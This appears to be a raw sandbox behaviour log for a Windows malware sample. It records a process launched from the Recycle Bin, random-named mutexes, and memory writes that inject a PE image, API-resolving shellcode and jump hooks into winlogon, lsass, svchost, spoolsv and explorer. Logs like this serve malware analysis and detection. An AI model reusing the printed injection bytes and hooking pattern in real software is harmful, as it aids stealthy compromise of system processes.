C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\zXeRY3a_PtW|00FFFFFF success or wait 1 18206B4
\BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 1 19E06B4
\BaseNamedObjects\Global\System64 success or wait 1 BAE0EF7
\BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 1 BB60EF7
Process Activities:
+ Process started
PID Filepath Cmdline Flags Completion Count Source Address
2444 C:\Recycle.Bin\B6232F3AC2C.exe C:\Recycle.Bin\B6232F3AC2C.exe 0 success or wait 1 181033E
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
2432 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1820639
1448 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 19E0639
1076 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 BAD6140
932 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 BAD6140
3448 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 BAD6140
3452 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 BB56140
3896 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 BB56140
3912 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 BB56140
924 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 BB56140
2196 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 BAD6140
2188 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1F710B2
2192 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 BAD6140
+ Thread delayed
TID Delay Completion Count Source Address
9266 1s success or wait 6 1810BFF
4214 0s success or wait 1242 BAED21A
8584 80s success or wait 1 1F71EFE
8594 540s no status 0 BAEBDC2
5192 -1s no status 0 BAF18D7
+ Thread terminated
TID PID Completion Count Source Address
2432 1636 success or wait 0 181096F
Memory Activities:
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
636 C:\WINDOWS\system32\winlogon.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
636 C:\WINDOWS\system32\winlogon.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
636 C:\WINDOWS\system32\winlogon.exe A30000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
636 C:\WINDOWS\system32\winlogon.exe 7C90CFEE 5 E9 BF 33 12 84 success or wait 1 BAE2A6F
692 C:\WINDOWS\system32\lsass.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
692 C:\WINDOWS\system32\lsass.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
692 C:\WINDOWS\system32\lsass.exe 9B0000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
692 C:\WINDOWS\system32\lsass.exe 7C90CFEE 5 E9 BF 33 0A 84 success or wait 1 BAE2A6F
892 C:\WINDOWS\system32\svchost.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
892 C:\WINDOWS\system32\svchost.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
892 C:\WINDOWS\system32\svchost.exe EB0000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
892 C:\WINDOWS\system32\svchost.exe 7C90CFEE 5 E9 BF 33 5A 84 success or wait 1 BAE2A6F
968 C:\WINDOWS\system32\svchost.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
968 C:\WINDOWS\system32\svchost.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
968 C:\WINDOWS\system32\svchost.exe AF0000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
968 C:\WINDOWS\system32\svchost.exe 7C90CFEE 5 E9 BF 33 1E 84 success or wait 1 BAE2A6F
1052 C:\WINDOWS\system32\svchost.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
1052 C:\WINDOWS\system32\svchost.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
1052 C:\WINDOWS\system32\svchost.exe 1A80000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
1052 C:\WINDOWS\system32\svchost.exe 7C90CFEE 5 E9 BF 33 17 85 success or wait 1 BAE2A6F
1100 C:\WINDOWS\system32\svchost.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
1100 C:\WINDOWS\system32\svchost.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
1100 C:\WINDOWS\system32\svchost.exe 890000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
1100 C:\WINDOWS\system32\svchost.exe 7C90CFEE 5 E9 BF 33 F8 83 success or wait 1 BAE2A6F
1144 C:\WINDOWS\system32\svchost.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
1144 C:\WINDOWS\system32\svchost.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
1144 C:\WINDOWS\system32\svchost.exe 990000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
1144 C:\WINDOWS\system32\svchost.exe 7C90CFEE 5 E9 BF 33 08 84 success or wait 1 BAE2A6F
1496 C:\WINDOWS\system32\spoolsv.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
1496 C:\WINDOWS\system32\spoolsv.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
1496 C:\WINDOWS\system32\spoolsv.exe A40000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
1496 C:\WINDOWS\system32\spoolsv.exe 7C90CFEE 5 E9 BF 33 13 84 success or wait 1 BAE2A6F
1636 C:\WINDOWS\explorer.exe BB50000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
